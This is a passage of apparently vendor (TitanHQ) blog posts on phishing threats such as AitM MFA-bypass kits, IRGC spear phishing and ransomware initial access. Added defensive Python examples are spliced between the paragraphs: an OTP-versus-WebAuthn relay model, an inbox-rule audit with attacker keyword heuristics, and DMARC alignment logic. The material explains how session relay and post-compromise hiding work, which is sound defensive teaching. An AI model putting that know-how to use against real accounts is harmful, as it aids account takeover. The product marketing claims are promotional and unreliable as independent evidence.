IPs and devices. 
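To make the difference between relayable and phishing-resistant MFA concrete, here is an added example that is not code from the SpamTitan post or from the Mamba 2FA kit. It models the two login paths side by side: a one-time code that the relying party accepts no matter where it was typed, and a WebAuthn assertion whose signed data carries the browser's origin and the hash of the relying-party ID, so that a copy produced on the proxy's lookalike domain fails verification. The authenticator signature is stood in for by an HMAC over a key both sides hold (real WebAuthn uses an asymmetric credential key pair); the domain names and the shared key are assumptions made for the demo.

```python
"""
Added example, not code from the SpamTitan post or from the Mamba 2FA kit:
a minimal model of why an adversary-in-the-middle (AitM) proxy that relays a
one-time code gets a valid session, while relaying a WebAuthn/FIDO2 assertion
does not. The authenticator signature is stood in for by an HMAC over a key
both sides hold (real WebAuthn uses an asymmetric key pair); the origin check
and the rpIdHash check are the part that matters. Domains are assumptions.
"""
import hashlib
import hmac
import json
import secrets

LEGIT_RP_ID = "login.example.com"
LEGIT_ORIGIN = "https://login.example.com"
PHISH_ORIGIN = "https://login-example.com"   # lookalike host served by the AitM proxy
PHISH_RP_ID = "login-example.com"            # the browser derives rpId from the page it is on

CRED_KEY = b"demo-credential-key"            # stand-in for the credential private key


# ---- OTP path: the relying party only sees a code, never where it was typed ----
def rp_check_otp(submitted: str, expected: str) -> bool:
    return hmac.compare_digest(submitted, expected)


def aitm_relay_otp(expected_otp: str) -> bool:
    """Victim types the code into the phishing page; the proxy forwards it unchanged."""
    code_typed_on_phish_page = expected_otp                      # read off the victim's phone
    return rp_check_otp(code_typed_on_phish_page, expected_otp)  # accepted: session cookie goes to the proxy


# ---- WebAuthn path: the browser stamps the current origin and rpId into what gets signed ----
def authenticator_get_assertion(challenge: str, origin: str, rp_id: str) -> dict:
    client_data = json.dumps(
        {"type": "webauthn.get", "challenge": challenge, "origin": origin}, sort_keys=True
    ).encode()
    # authenticatorData = SHA-256(rpId) || flags || signCount  (32 + 1 + 4 bytes)
    auth_data = hashlib.sha256(rp_id.encode()).digest() + b"\x01" + (1).to_bytes(4, "big")
    signed = auth_data + hashlib.sha256(client_data).digest()
    sig = hmac.new(CRED_KEY, signed, hashlib.sha256).digest()
    return {"clientDataJSON": client_data, "authenticatorData": auth_data, "signature": sig}


def rp_verify_assertion(challenge: str, assertion: dict) -> bool:
    cd = json.loads(assertion["clientDataJSON"])
    if cd.get("type") != "webauthn.get" or cd.get("challenge") != challenge:
        return False
    if cd.get("origin") != LEGIT_ORIGIN:            # origin binding: the proxy's origin differs
        return False
    auth_data = assertion["authenticatorData"]
    if auth_data[:32] != hashlib.sha256(LEGIT_RP_ID.encode()).digest():
        return False                                 # rpIdHash binding
    signed = auth_data + hashlib.sha256(assertion["clientDataJSON"]).digest()
    expected = hmac.new(CRED_KEY, signed, hashlib.sha256).digest()
    return hmac.compare_digest(expected, assertion["signature"])


def direct_webauthn_login() -> bool:
    challenge = secrets.token_urlsafe(32)
    return rp_verify_assertion(challenge, authenticator_get_assertion(challenge, LEGIT_ORIGIN, LEGIT_RP_ID))


def aitm_relay_webauthn() -> bool:
    """Proxy forwards the real challenge, but the victim's browser is on the phishing origin."""
    challenge = secrets.token_urlsafe(32)                      # fetched from the real RP by the proxy
    relayed = authenticator_get_assertion(challenge, PHISH_ORIGIN, PHISH_RP_ID)
    return rp_verify_assertion(challenge, relayed)             # False: origin and rpIdHash mismatch


def tampered_relay_webauthn() -> bool:
    """Proxy rewrites origin and rpIdHash to the legitimate values; the signature no longer matches."""
    challenge = secrets.token_urlsafe(32)
    relayed = authenticator_get_assertion(challenge, PHISH_ORIGIN, PHISH_RP_ID)
    fixed = json.loads(relayed["clientDataJSON"])
    fixed["origin"] = LEGIT_ORIGIN
    relayed["clientDataJSON"] = json.dumps(fixed, sort_keys=True).encode()
    relayed["authenticatorData"] = hashlib.sha256(LEGIT_RP_ID.encode()).digest() + relayed["authenticatorData"][32:]
    return rp_verify_assertion(challenge, relayed)             # False: signed bytes were altered


if __name__ == "__main__":
    print("OTP relayed through AitM proxy accepted:  ", aitm_relay_otp("482913"))
    print("WebAuthn direct login accepted:           ", direct_webauthn_login())
    print("WebAuthn relayed through proxy accepted:  ", aitm_relay_webauthn())
    print("WebAuthn relayed with fields rewritten:   ", tampered_relay_webauthn())
```

The point the model makes is that the proxy never gets to choose what the browser puts in clientDataJSON: the origin is whatever page the victim is actually on, and the browser refuses to request an rpId that is not a registrable suffix of that origin, so the attacker can neither obtain a usable assertion nor patch one up after the fact.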
While these\r\nadvanced phishing kits are effective, threat actors must convince people to click a link in an email and disclose\r\ntheir login credentials, and with advanced email security solutions these phishing threats can be identified and\r\nblocked before they reach inboxes. Training should also be provided to the workforce to help with the\r\nidentification and avoidance of phishing.\r\nTitanHQ can help through the SpamTitan cloud-based spam filtering service and the SafeTitan security awareness\r\ntraining and phishing simulation platform. SpamTitan incorporates reputation checks, Bayesian analysis,\r\ngreylisting, machine learning-based detection, antivirus scans, and email sandboxing to block phishing and\r\nmalware threats. Independent tests demonstrated SpamTitan was one of the best spam filtering solutions for\r\nbusinesses at blocking threats, with a 99.99% phishing block rate and a 100% malware block rate.\r\nThe SafeTitan security awareness training platform makes it easy for businesses to provide regular cybersecurity\r\nawareness training. The platform includes more than 80 training modules, videos, and webinars, with hundreds of\r\nphishing simulation templates based on real-world phishing examples. Regular training and phishing simulations\r\nhave been proven to be highly effective at reducing susceptibility to phishing and other threats targeting\r\nemployees. This month, TitanHQ has also launched its security awareness training platform for MSPs, which has\r\nbeen specifically developed to make it quick and easy for MSPs to incorporate security awareness training into\r\ntheir service stacks. 
Speak with TitanHQ today for more information about these and other cybersecurity solutions\r\nfor combatting the full range of cyber threats.\r\nCyber Actors Conducting Spear Phishing Campaigns for Iranian State\r\nby G Hunt | September 30, 2024 | Internet Security, Network Security\r\nSpear phishing attacks are being conducted by a cyber threat group working on behalf of Iran’s Islamic\r\nRevolutionary Guard Corps. The cyber threat actors have been gaining access to the personal and business\r\naccounts of targeted individuals to obtain information to support Iran’s information operations.\r\nAccording to a joint cybersecurity advisory issued by the Federal Bureau of Investigation (FBI), U.S. Cyber\r\nCommand – Cyber National Mission Force (CNMF), the Department of the Treasury (Treasury), and the United\r\nKingdom’s National Cyber Security Centre (NCSC), the campaign has been targeting individuals with a nexus to\r\nIranian and Middle Eastern affairs, including journalists, political activists, government officials, think tank\r\npersonnel, and individuals associated with US political campaign activity.\r\nIndividuals are typically contacted via email or messaging platforms. As is common in spear phishing attacks, the\r\ncyber threat actors impersonate trusted contacts, who may be colleagues, associates, acquaintances, or family\r\nmembers. In some of the group’s attacks, they have impersonated known email service providers, well-known\r\njournalists seeking interviews, contacts offering invitations to conferences or embassy events, or individuals\r\noffering speaking engagements. 
There have been instances where the impersonated individual is seeking\r\nforeign policy discussions and opinions.\r\nIn contrast to standard phishing attacks where the victim is sent a malicious email attachment or link to a phishing\r\nwebsite in the initial email, more effort is put into building a rapport with the victim to make them believe they are\r\nengaging with the person the scammer is impersonating. There may be several exchanges via email or a\r\nmessaging platform before the victim is sent a malicious link, which may be embedded in a shared document\r\nrather than being directly communicated via email or a messaging app.\r\nIf the link is clicked, the victim is directed to a fake email account login page where they are tricked into\r\ndisclosing their credentials. If entered, the credentials are captured and used to log in to the victim’s account. If the\r\nvictim’s account is protected with multi-factor authentication, they may also be tricked into disclosing MFA codes.\r\nIf access to the account is gained, the cyber threat actor can exfiltrate messages and attachments, set up email\r\nforwarding rules, delete or manipulate messages, and use the account to target other individuals of interest.\r\nSpear phishing attempts are harder to identify than standard phishing attempts as greater effort is put in by the\r\nattackers, including personalizing the initial contact messages, engaging in conversations spanning several\r\nmessages, and using highly plausible and carefully crafted lures. These emails may bypass standard spam filtering\r\nmechanisms since the emails are not sent in mass campaigns and the IP addresses and domains used may not have\r\nbeen added to blacklists.\r\nIt is important to have robust anti-phishing, anti-spam, and anti-spoofing solutions in place to increase protection\r\nand prevent these malicious emails from reaching their intended targets. 
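The post-compromise actions just described (forwarding rules, deleted or hidden messages) leave durable traces in the mailbox configuration that can be audited long after the login itself has aged out of the logs. The following is an added example, not part of the SpamTitan post: an audit over an exported list of inbox rules that flags external forwarding, hide-and-delete rules keyed on security-related words, and rules with throwaway names. The JSON shape is an assumption loosely modelled on Exchange Online inbox-rule property names; adapt the field names to whatever export you have. The mailboxes, rule names, addresses and keyword list are constructed for the demo.

```python
"""
Added example, not part of the SpamTitan post: audit exported mailbox inbox
rules for the patterns an attacker leaves behind after an account takeover.
The JSON shape is an assumption loosely modelled on Exchange Online
inbox-rule properties (ForwardTo, RedirectTo, DeleteMessage, MoveToFolder,
SubjectContainsWords ...). Mailboxes, names and addresses are constructed.
"""
import json
import re
from dataclasses import dataclass

ORG_DOMAINS = {"example.com"}                                           # assumption: our own domains
HIDE_FOLDERS = {"rss subscriptions", "rss feeds", "conversation history", "junk email", "deleted items"}
HIDE_WORDS = {"password", "security alert", "invoice", "payment", "wire", "unusual sign-in"}
ADDR_RE = re.compile(r"[\w.+-]+@[\w.-]+\.\w+")


@dataclass
class Finding:
    mailbox: str
    rule: str
    reason: str


def external_addresses(values) -> list:
    """Pull SMTP addresses out of 'Display Name [SMTP:user@host]' or bare-address entries."""
    found = []
    for v in values or []:
        for addr in ADDR_RE.findall(v):
            if addr.rsplit("@", 1)[1].lower() not in ORG_DOMAINS:
                found.append(addr.lower())
    return found


def audit_rules(export_json: str) -> list:
    """Return one Finding per suspicious property of each enabled rule, in export order."""
    findings = []
    for r in json.loads(export_json):
        if not r.get("Enabled", True):
            continue
        mailbox, name = r["Mailbox"], r.get("Name", "")

        # 1. Any forward/redirect to an address outside the organization.
        targets = (external_addresses(r.get("ForwardTo"))
                   + external_addresses(r.get("RedirectTo"))
                   + external_addresses(r.get("ForwardAsAttachmentTo")))
        if targets:
            findings.append(Finding(mailbox, name, f"forwards to external: {', '.join(sorted(set(targets)))}"))

        # 2. Delete or bury messages whose subject/body mentions security or money.
        words = [w.lower() for w in (r.get("SubjectContainsWords") or []) + (r.get("BodyContainsWords") or [])]
        hides = bool(r.get("DeleteMessage")) or (r.get("MoveToFolder") or "").lower() in HIDE_FOLDERS
        if hides and any(w in HIDE_WORDS for w in words):
            findings.append(Finding(mailbox, name, f"hides messages matching {words}"))

        # 3. Heuristic: rule names that are empty or punctuation only.
        if not name.strip(" .,-_"):
            findings.append(Finding(mailbox, name, "rule name is empty or punctuation only"))
    return findings


# Constructed export: one benign rule, one attacker hide rule, one external forward, one disabled rule.
RULES_EXPORT = json.dumps([
    {"Mailbox": "alice@example.com", "Name": "Vendor invoices", "Enabled": True,
     "SubjectContainsWords": ["invoice"], "MoveToFolder": "Invoices"},
    {"Mailbox": "alice@example.com", "Name": ".", "Enabled": True,
     "SubjectContainsWords": ["password", "security alert"], "DeleteMessage": True, "MarkAsRead": True},
    {"Mailbox": "bob@example.com", "Name": "Archive", "Enabled": True,
     "ForwardTo": ["Bob Personal [SMTP:bob.backup@webmail.example.net]"]},
    {"Mailbox": "carol@example.com", "Name": "Old forward", "Enabled": False,
     "RedirectTo": ["someone@example.org"]},
])

if __name__ == "__main__":
    for f in audit_rules(RULES_EXPORT):
        print(f"{f.mailbox:20} rule={f.rule!r:18} {f.reason}")
```

Run this on a scheduled export rather than once: the rules are cheap for an attacker to re-create, and a rule that appears in a mailbox after a suspicious sign-in is a much stronger signal than either event on its own.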
An advanced spam filtering solution\r\nshould be used that incorporates Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM), and\r\nDomain-based Message Authentication Reporting and Conformance (DMARC) to identify spoofing and validate\r\ninbound emails. SpamTitan also incorporates machine learning and AI-based detection to help identify spear\r\nphishing attempts.\r\nIf you are a Microsoft 365 user, the anti-spam and anti-phishing mechanisms provided by Microsoft should be\r\naugmented with a third-party anti-phishing solution. PhishTitan can detect the spear phishing emails that\r\nMicrosoft’s EOP and Defender often miss while adding a host of detection mechanisms and anti-phishing features\r\nincluding adding banners to emails from external sources.\r\nOne of the main defenses against these attacks is vigilance. An end-user security awareness training program\r\nshould be implemented to improve awareness of spear phishing attacks. SafeTitan makes this as easy as possible\r\nand covers all possible attack scenarios, with training provided in short and easy-to-assimilate training modules. It\r\nis also important to conduct phishing simulations to raise and maintain awareness. These simulations can be\r\nespecially effective at raising awareness about spear phishing emails and giving end users practice at identifying\r\nthese threats.\r\nMultifactor authentication should be enabled on all accounts, with phishing-resistant multi-factor authentication\r\nproviding the highest degree of protection. IT teams should also consider prohibiting email forwarding rules from\r\nautomatically forwarding emails to external addresses and conducting regular scans of the company email server\r\nto identify any custom rules that have been set up or changes to the configuration. 
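The SPF, DKIM and DMARC checks recommended above only stop spoofing when the authenticated identifiers line up with the domain the recipient actually sees in the From header; a message that passes SPF and DKIM for the attacker's own sending domain still fails DMARC for the spoofed one. The following is an added example, not code from the SpamTitan post and not SpamTitan's own implementation: the DMARC identifier-alignment logic that turns SPF and DKIM results into a pass/fail verdict and a disposition. It takes the SPF and DKIM results as inputs (producing them needs DNS lookups and signature verification, which are out of scope here) and parses a DMARC TXT record string. The tiny public-suffix list and every domain and record below are constructed for the demo.

```python
"""
Added example (not code from the SpamTitan post and not SpamTitan's own
implementation): DMARC identifier alignment. SPF and DKIM results are taken
as inputs; the DMARC record is parsed from its TXT string. The public-suffix
stand-in and all domains/records are constructed for the demo.
"""
from dataclasses import dataclass

# Stand-in for the Public Suffix List (assumption); real code should use the PSL.
PUBLIC_SUFFIXES = {"com", "net", "org", "co.uk"}


def org_domain(domain: str) -> str:
    """Organizational domain: one label above the longest matching public suffix."""
    labels = domain.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[max(i - 1, 0):])
    return domain.lower()


def parse_dmarc(txt: str) -> dict:
    """'v=DMARC1; p=reject; aspf=s' -> {'v': 'DMARC1', 'p': 'reject', 'aspf': 's'}."""
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v", "").upper() != "DMARC1":
        raise ValueError("not a DMARC record")
    return tags


def aligned(auth_domain: str, from_domain: str, mode: str) -> bool:
    """Strict ('s'): exact match. Relaxed ('r', the default): same organizational domain."""
    if mode == "s":
        return auth_domain.lower() == from_domain.lower()
    return org_domain(auth_domain) == org_domain(from_domain)


@dataclass
class Verdict:
    spf_aligned: bool
    dkim_aligned: bool
    dmarc_pass: bool
    disposition: str


def evaluate(from_domain, dmarc_txt, spf_result, spf_domain, dkim_result, dkim_domain) -> Verdict:
    """
    from_domain : domain of the RFC5322.From header (what the recipient sees)
    spf_domain  : RFC5321.MailFrom domain that SPF was evaluated against
    dkim_domain : d= tag of a DKIM signature that verified
    """
    t = parse_dmarc(dmarc_txt)
    spf_ok = spf_result == "pass" and aligned(spf_domain, from_domain, t.get("aspf", "r"))
    dkim_ok = dkim_result == "pass" and aligned(dkim_domain, from_domain, t.get("adkim", "r"))
    passed = spf_ok or dkim_ok
    policy = t.get("p", "none").lower()
    if passed:
        disposition = "deliver"
    elif policy in ("quarantine", "reject"):
        disposition = policy
    else:
        disposition = "deliver (p=none: report only)"
    return Verdict(spf_ok, dkim_ok, passed, disposition)


# Constructed records.
DMARC_REJECT = "v=DMARC1; p=reject; adkim=r; aspf=r; rua=mailto:dmarc-reports@example.com"
DMARC_STRICT = "v=DMARC1; p=quarantine; adkim=s; aspf=s"

if __name__ == "__main__":
    # Spoofed From: the attacker's bulk-mail domain passes SPF and DKIM for *its own* domain only.
    print(evaluate("example.com", DMARC_REJECT, "pass", "bulk-sender.net", "pass", "bulk-sender.net"))
    # Legitimate mail from a subdomain under relaxed alignment.
    print(evaluate("example.com", DMARC_REJECT, "pass", "mail.example.com", "none", ""))
    # Same subdomain under strict alignment: SPF no longer aligns, the DKIM d=example.com signature carries it.
    print(evaluate("example.com", DMARC_STRICT, "pass", "mail.example.com", "pass", "example.com"))
```

Two things the model leaves out on purpose: the `pct` tag (which applies the policy to only a sample of failing mail) and the `sp` tag for subdomains. Both matter when you tune your own record, but neither changes the alignment logic shown here.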
Alerts should also be\r\nconfigured for any suspicious activity such as logins from foreign IP addresses.\r\nSchool Cyberattacks Increase 55% with Phishing Attacks the Most Common\r\nThreat\r\nby G Hunt | September 30, 2024 | Security Awareness\r\nWhile no sector is immune to cyberattacks, some sectors are targeted more frequently than others and attacks on\r\nthe education sector are common and on the rise. In May 2024, new data released by the UK’s Information\r\nCommissioner’s Office revealed there had been 347 cyber incidents reported by the education and childcare sector\r\nin 2023, an increase of 55% from the previous year.\r\nThese attacks can prevent access to IT systems, forcing schools to resort to manual processes for checking pupil\r\nregisters, teaching, and all other school functions. Without access to IT systems, teachers are unable to prepare for\r\nlessons, schools have been prevented from taking payment for pupil lunches, and many have lost students’\r\ncoursework. The impact on schools, teachers, and students can be severe. Some schools have been forced to\r\ntemporarily close due to a cyberattack.\r\nA survey conducted by the Office of Qualifications and Examinations Regulation (Ofqual) found that 9% of\r\nsurveyed headteachers had experienced a critically damaging cyberattack in the past academic year. 20% of\r\nschools were unable to immediately recover from a cyberattack and 4% reported that they still had not returned to\r\nnormal operations more than half a term later.\r\nThe Ofqual survey revealed more than one-third of English schools had suffered a cyber incident in the past\r\nacademic year and a significant percentage faced ongoing disruption due to a cyberattack. 
Cyberattacks can take\r\nmany forms and while ransomware attacks are often the most damaging, the most common type of cyber incident\r\nis phishing. According to the survey, 23% of schools and colleges in England experienced a cybersecurity incident\r\nas a result of a phishing attack in the past year.\r\nSchools are not sufficiently prepared to deal with these attacks. According to the survey, 1 in 3 teachers said they\r\nhad not been provided with cybersecurity training in the past year, even though cybersecurity training has proven\r\nto be effective at preventing cyberattacks. The survey revealed that out of the 66% of teachers who had been\r\nprovided with training, two-thirds said it was useful.\r\nTitanHQ has developed a comprehensive security awareness training platform for all sectors, that is easy to tailor\r\nto meet the needs of individual schools. The platform includes an extensive range of computer-based training\r\ncontent, split into modules of no more than 10 minutes to make it easy for teachers and other staff members to\r\ncomplete. The training material is enjoyable, covers the specific threats that educational institutions face, and\r\nteaches the cybersecurity practices that can help to improve defenses and combat phishing, spear phishing, and\r\nmalware attacks.\r\nThe SafeTitan platform also includes a phishing simulator for conducting simulated phishing attacks to improve\r\nawareness, reinforce training, and give staff members practice in identifying phishing and other cyber threats. The\r\ntraining and simulations can be automated, and training modules can be set to be triggered by security errors and\r\nrisky behaviors. Further, the platform is affordable.\r\nTo find out more about improving human defenses at your educational institution through SafeTitan, give the\r\nTitanHQ team a call. 
TitanHQ can also help with improving technical defenses, with a suite of cybersecurity\r\nsolutions for the education sector including SpamTitan anti-spam software, the PhishTitan anti-phishing solution,\r\nand the WebTitan DNS-based web filter. Combined, these technical defenses can greatly improve your security\r\nposture and prevent cyber threats from reaching end users and their devices.\r\nRansomware Attacks Often Start with Malware Infections or Phishing Attacks\r\nby G Hunt | September 15, 2024 | Network Security\r\nRansomware attacks can cause an incredible amount of damage to an organization’s reputation as well as huge\r\nfinancial losses from the downtime they cause. Recovery from an attack, regardless of whether the ransom is paid,\r\ncan take weeks and the theft and publication of sensitive data on the dark web can prompt customers to leave in\r\ntheir droves. Attacks are still being conducted in high numbers, especially in the United States and the United\r\nKingdom. One recent survey indicates that 90% of businesses in those countries have experienced at least one\r\nattack in the past 12 months, with three-quarters of organizations suffering more than one attack in the past year.\r\nThe healthcare sector is often attacked as defenses are perceived to be weak and sensitive data can be easily\r\nstolen, increasing the chance of the ransom being paid. The Inc Ransom group has been targeting the healthcare\r\nsector and conducted an attack on an NHS Trust in Scotland earlier this year, stealing 3 TB of sensitive data and\r\nsubsequently publishing that data on the dark web when the ransom wasn’t paid.\r\nThe Inc Ransom group also conducted an attack on a Michigan healthcare provider, preventing access to its\r\nelectronic medical record system for 3 weeks in August. 
A group called Qilin attacked an NHS pathology\r\nprovider, Synnovis, in June 2024, which had a huge impact on patient services, causing a shortage of blood in\r\nLondon hospitals that caused many surgeries to be postponed. Education is another commonly attacked sector.\r\nThe Billericay School in Essex had its IT system encrypted, forcing the school to temporarily close. In all of these\r\nattacks, highly sensitive data was stolen and held to ransom. The public sector, healthcare, and schools are\r\nattractive targets due to the value of the sensitive data they hold, and attacks on businesses cause incredibly costly\r\ndowntime, both of which can force victims into paying ransoms. What is clear from the reporting of attacks is that no\r\nsector is immune.\r\nThere is increasing evidence that ransomware groups are relying on malware for initial access. Microsoft recently\r\nreported that a threat actor tracked as Vanilla Tempest (aka Vice Society) that targets the healthcare and education\r\nsectors has started using Inc ransomware in its attacks and uses the Gootloader malware downloader for initial\r\naccess. A threat actor tracked as Storm-0494 is responsible for the Gootloader infections and sells access to the\r\nransomware group. Infostealer malware is also commonly used in attack chains. The malware is installed by threat\r\ngroups that act as initial access brokers, allowing them to steal credentials to gain access to networks and then sell\r\nthat access to ransomware groups. Phishing is also commonly used for initial access and is one of the main initial\r\naccess vectors in ransomware attacks, providing access in around one-quarter of attacks.\r\nInfostealer malware is often able to evade antivirus solutions and is delivered via malicious websites, drive-by malware downloads, or phishing emails. 
Gootloader infections primarily occur via malicious websites, with\r\nmalvertising used to direct users to malicious sites where they are tricked into downloading and installing\r\nmalware. Credentials are commonly compromised in phishing attacks, with employees tricked into disclosing\r\ntheir passwords by attackers impersonating trusted individuals and companies.\r\nAdvanced cybersecurity defenses are needed to combat these damaging cyberattacks. In addition to traditional\r\nantivirus software, businesses need to implement defenses capable of identifying the novel malware threats that\r\nantivirus software is unable to detect. One of the best defenses is an email sandbox, where emails are sent for\r\nbehavioral analysis. In the sandbox – an isolated, safe environment – file attachments are executed, and their\r\nbehavior is analyzed, rather than relying on malware signatures for detection, and links are followed to identify\r\nmalicious content.\r\nDNS filters are valuable tools for blocking web-based delivery of malware. They can be used to control access to\r\nthe Internet, prevent malvertising redirects to malicious websites, block downloads of dangerous file types from\r\nthe Internet, and block access to known malicious URLs. Employees are tricked into taking actions that provide\r\nattackers with access to their networks, by installing malware or disclosing their credentials in phishing attacks, so\r\nregular security awareness training is important along with tests of knowledge using phishing simulations.\r\nThere is unfortunately no silver bullet when it comes to stopping ransomware attacks; however, that does not\r\nmean protecting against ransomware attacks is difficult for businesses. TitanHQ offers a suite of easy-to-use\r\ncybersecurity solutions that provide cutting-edge protection against ransomware attacks. 
TitanHQ’s award-winning products combine advanced detection techniques, such as email sandboxing and AI and machine-learning-based\r\ndetection, with threat intelligence fed from a massive global network of endpoints to ensure businesses are well\r\nprotected from the full range of threats.\r\nGive the TitanHQ team a call today and have a chat about improving your defenses with advanced anti-spam\r\nsoftware, anti-phishing protection, DNS filtering, and security awareness training solutions and put the solutions\r\nto the test on a free trial to see for yourself the difference they make.\r\nIs Your Business Protected Against Internal Phishing Attempts?\r\nby G Hunt | August 29, 2024 | Phishing & Email Spam, Security Awareness\r\nIf a phishing attempt is successful and a threat actor gains access to an employee’s email account, it is common for\r\nthe compromised email account to be used for internal phishing. Some malware variants also allow threat actors to\r\nhijack email accounts and send malware internally, adding a copy of the malware to a message thread to make it\r\nappear that a file was attached in response to a past email conversation.\r\nThere are several scenarios in which these attacks occur: business email compromise\r\nattacks, to gain access to an email account that can be used for the scam – a CEO, executive, HR, or IT department\r\naccount, for example; distributing malware widely to compromise as many accounts as possible; gaining\r\naccess to multiple email accounts; or compromising multiple accounts to gain access to sensitive data.\r\nIn industries where data breach reporting is mandatory, such as in healthcare in the United States, email account\r\nbreaches are regularly reported where unauthorized activity is detected in a single email account, and the\r\nsubsequent investigation reveals multiple employee email accounts have been compromised through 
internal\r\nphishing.\r\nInternal phishing attempts are much harder to identify than phishing attempts from external email accounts. Even\r\nwhen email security solutions incorporate outbound scanning, these phishing attempts are often not recognized as\r\nmalicious as the emails are sent from a trusted account. The recipients of these emails are also much more likely\r\nto trust an internal email than an external email from an unknown sender and open the email, click a link, or open\r\na shared file.\r\nAttackers may also spoof an internal email account. It is easy to find out the format used by a company for their\r\nemails, and names can be found on professional networking sites. A good email security solution should be able to\r\nidentify these spoofed emails, but if they arrive in an inbox, an employee may be fooled into thinking that the\r\nemail is a genuine internal email.\r\nIt is important for businesses to take steps to combat internal phishing as it is a common weak point in email\r\ndefenses. Unfortunately, there is no single technical control that can protect against these phishing attempts. What\r\nis required is a combination of measures to provide layered protection. With layered security, if one measure fails\r\nto protect against a threat, others are in place that can thwart the attempt.\r\nThe best place to start is with a technical measure to identify and block these phishing threats. Spam filter\r\nsoftware naturally needs to have inbound as well as outbound scanning; however, standard checks such as\r\nreputation scans are not enough. 
An email security solution should have AI and machine learning capabilities for\r\nassessing how emails deviate from standard emails sent internally and for in-depth analysis of message content.\r\nLink scanning is also important, with URL rewriting to identify the true destination of embedded URLs, OLE\r\ndetection, and email sandboxing to identify malicious attachments – not just malware but also malicious links in\r\nemail attachments.\r\nSecurity awareness training is vital as employees may not be aware of threats they are likely to encounter. Security\r\nawareness training should include internal phishing and employees should be made aware that they should not\r\nautomatically trust internal emails as they may not be what they seem. Security awareness training should be\r\naccompanied by phishing simulations, including simulated phishing attempts from internal email accounts. These\r\nwill give employees practice in identifying phishing and security teams will learn how susceptible the workforce\r\nis and can then take steps to address the problem.\r\nMulti-factor authentication is required. If a phishing attempt is not identified by either a security solution or the\r\nemployee, and the employee responds and divulges their credentials, they can be used by the threat actor to access\r\nthe employee’s email account. Multi-factor authentication protects against this by requiring another factor – in\r\naddition to a password – to be provided. The most robust form of MFA is phishing-resistant MFA, although any\r\nform of MFA is better than none.\r\nTitanHQ can help protect against phishing attacks of all types through the SpamTitan cloud-based spam filtering\r\nservice, the PhishTitan anti-phishing solution for M365, and the SafeTitan security awareness training and\r\nphishing simulation platform.\r\nThe engine that powers SpamTitan and PhishTitan has an exceptional phishing catch rate, including internal\r\nphishing attempts. 
The engine incorporates AI and machine learning algorithms that can detect novel phishing\r\nattempts and emails that deviate from the normal emails sent internally, as well as OLE detection, URL rewriting,\r\nand email sandboxing for catching novel malware and phishing threats.\r\nThe SafeTitan security awareness training platform includes an extensive library of training content to teach\r\nsecurity best practices, eradicate risky behaviors, and train employees on how to recognize an extensive range of\r\nthreats. The phishing simulator makes it easy to conduct internal phishing tests on employees to test knowledge\r\nand give employees practice at identifying email threats. Usage data shows the platform can reduce employee\r\nsusceptibility to phishing attempts by up to 80%.\r\nFor more information about improving your phishing defenses, speak with TitanHQ today.\r\nCommon Phishing Examples That Employees Fall For\r\nby G Hunt | August 28, 2024 | Spam Software\r\nPhishing is the name given to a type of cyberattack where the threat actor uses deception to trick an individual into\r\ntaking an action that benefits the threat actor. A lure is used to get the targeted individual to respond and these\r\nattacks typically create a sense of urgency. Urgency is required as phishers need users to act quickly rather than\r\nstop and think about the request. The faster the response, the less time there is to identify the scam for what it is.\r\nThere is often a threat to help create a sense of urgency, such as negative consequences if no action is taken.\r\nPhishing can take place over the phone, SMS, and instant messaging platforms, but email is the most common\r\nway of getting the phishing lure in front of an employee. 
It is now common for businesses to provide security\r\nawareness training to the workforce to raise awareness of phishing threats and to have a spam email filter in place\r\nto detect and quarantine these malicious emails before they reach inboxes; however, even with robust defenses in\r\nplace, some malicious emails will arrive in inboxes and employees are often tricked into responding.\r\nSecurity awareness training programs teach employees to stop and think before acting on any request in an email,\r\nwhich is the last thing phishers want the recipients of their emails to do. One of the ways they can get a quick\r\nresponse is to make the recipient believe that the email has been sent from an internal email account, either\r\nthrough spoofing or by using a compromised internal email account. Some of the lures used in phishing attempts\r\nthat the majority of employees will at least open and read are detailed below.\r\nHR Themed Phishing Emails\r\nOne of the ways that phishers increase the chance of a user responding is to use a Human Resources (HR)-themed\r\nlure, as any communication from the HR department is usually taken seriously by employees. 
These phishing\r\nattempts include the types of notifications that HR departments often send via email, examples of which include:\r\nChanges to working hours\r\nUpdates to working practices\r\nDress code changes\r\nUpcoming training/cybersecurity training sessions\r\nAnnual leave notifications\r\nPayroll information requests\r\nTax matters\r\nHealthcare and wellness benefit updates\r\nEmployee rewards programs\r\nNotifications about disciplinary procedures\r\nIT Department Notifications\r\nNotifications from the IT department are also common as employees typically open these emails and act quickly.\r\nThese include:\r\nInternet activity reports\r\nSecurity alerts\r\nThe discovery of unauthorized software\r\nChanges to access rights\r\nRequired software installations\r\nNotifications from Board Members\r\nPhishers often impersonate the CEO or other executives, as they know that employees will want to respond\r\nquickly and are unlikely to question requests from these authority figures. CEOs are commonly impersonated in\r\nbusiness email compromise attacks, where the threat actor tries to get an employee to make a wire transfer to their\r\naccount, purchase gift cards, or divulge sensitive information. These emails may include a hyperlink to a website\r\nwhere the user is told they must enter their login credentials, a hyperlink to a website where a file download takes\r\nplace, or the emails may include an attachment. Common file types used in these email campaigns include PDF\r\nfiles, HTML attachments, Office files, and compressed files. These files may contain malware or malicious\r\nscripts, or may be used to hide information from spam filtering software. For example, PDF files containing\r\nmalicious links are commonly used. 
By adding the link to the PDF file, there is less chance that spam filtering\r\nsoftware will find and follow the link.\r\nHow to Defend Against These Common Email Threats\r\nDefending against email attacks requires advanced anti-spam software and regular security awareness training for\r\nthe workforce. SpamTitan from TitanHQ is an advanced cloud-based anti-spam service that performs\r\ncomprehensive checks for spam and malicious emails, including an inbound spam filter and outbound filtering\r\nwith data loss prevention. SpamTitan performs reputation checks of the sender’s domain and email account,\r\nrecipient verification, anti-spoofing checks, and alias recognition, and allows geoblocking to prevent the delivery\r\nof emails from certain locations (overseas, for instance).\r\nSpamTitan also incorporates extensive content filtering mechanisms, including rewriting URLs to identify the true\r\ndestination, URL checks to identify malicious content, anti-phishing measures including machine learning\r\nalgorithms to detect suspicious content that deviates from the standard emails typically received, Bayesian\r\nanalysis to identify spam and phishing, OLE detection, dual antivirus engines, and email sandboxing. Sandboxing\r\nis key to blocking malware threats, including previously unseen malware. With SpamTitan in place, the vast\r\nmajority of threats will not arrive in inboxes. In recent independent tests, SpamTitan had a 